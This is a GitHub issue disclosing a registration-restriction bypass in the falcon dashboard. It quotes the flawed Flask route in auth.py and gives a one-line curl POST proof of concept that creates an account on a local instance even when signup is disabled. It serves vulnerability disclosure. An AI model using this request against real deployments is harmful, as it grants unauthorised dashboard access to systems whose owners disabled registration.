Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Report a security vulnerability in falcon dashboard to bypass register restriction through the function in register has been closed #153

Closed
testivy opened this issue Feb 18, 2021 · 0 comments
Closed

Report a security vulnerability in falcon dashboard to bypass register restriction through the function in register has been closed #153

testivy opened this issue Feb 18, 2021 · 0 comments

Comments

@testivy
Copy link

testivy commented Feb 18, 2021

Dear Author,
I’m testivy. I found that the latest version 0.2.0 of falcon dashboard has a bypass problem of the registeration.As the link below:
http://book.open-falcon.com/en_0_2/quick_install/frontend.html#dashboard-user-management
when we try to change the value of item "signup_disable" to "true" in the API configuration file "cfg.json" then reboot API for a purpose to restrict the register function meaning that this is only for "sign in" not for "sign up".
I found in the code that I can bypass it under the "/auth/register " interface. In this condition, I can bypass the registeration restriction and do as below:
Call the user added interface and add a new user (POST https://127.0.0.1:8081/auth/register name=test&cnname=test&email=test@test.cn&password=xxx&repeat_password=xxx), then use the newly added account to log in to the dashboard for viewing ,modifing, and adding .

Vulnerability details
This problem mainly occurs in _dashboard/rrd/view/auth/auth.py_

@app.route("/auth/register", methods=["GET", "POST"])
def auth_register():
    if request.method == "GET":
        if g.user:
            return redirect("/auth/login")
        return render_template("auth/register.html", **locals())

    if request.method == "POST":
        ret = {"msg":""}

        name = request.form.get("name", "").strip()
        cnname = request.form.get("cnname", "").strip()
        email = request.form.get("email", "").strip()
        password = request.form.get("password", "")
        repeat_password = request.form.get("repeat_password", "")

As we can see, the above if branches:
in if request.method == "GET" will judge the g.user otherwise redirect to "/auth/login" ,But when the request.method == "POST",the system will get request param to add a account by "name,cnname,email,password and repeat_password" to the backend. Under the certain circumstances,we can directly call the "auth/register" interface with post method to add a new user.

Loopholes Reproduce
1.curl -XPOST 'http://127.0.0.1:8081/auth/register' --data 'name=test&cnname=test&email=test%40test.cn&password=test1234&repeat_password=test1234'
As we can see, register restriction has been bypassed and a new account has been added to the dashboard management without logging in.
The response is as below:
{"msg":""}
2.View the console
image

Visit the index page http://127.0.0.1:8081/, then log in to the new account, and you will can do anything.

Best Regards
@testivy testivy closed this as completed Feb 19, 2021
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@testivy